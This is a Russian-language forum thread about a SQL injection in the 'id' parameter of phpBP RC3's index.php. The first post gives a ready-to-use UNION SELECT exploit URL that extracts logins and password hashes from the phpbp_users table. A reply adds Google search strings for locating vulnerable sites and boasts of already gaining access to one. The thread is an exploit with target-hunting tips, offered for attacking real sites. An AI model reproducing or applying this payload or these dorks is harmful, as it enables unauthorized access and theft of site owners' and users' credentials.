SQL-инъекция в phpBP

[d1mka]

Программа: phpBP RC3 (2.204) FIX4

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

Для просмотра ссылки Войди или Зарегистрируйся[path]/index.php?function=banner_out&id=10000/* */LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F, login,0x5F,pass),4,5,6,7,8,9/**/FROM/* */phpbp_users/**/LIMIT/**/1/*

 

[Dador]

Искать в гугле можно так

"by PHP BP Team"

но так почти ничего нет, лучше так

"PHP BP jest darmowym polskim systemem portalowym."

т.е. во ссылочка на результаты =)

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

p.s. может ешсть ешё какие? просто эти сам взял как обычно снизу с копирайтов =) а их могут убрать (копирайты)

А куда прикидывает (у меня это

Для просмотра ссылки Войди или Зарегистрируйся

это и есть логин_пароль в md5
уже доступ от 1 сайта получил =)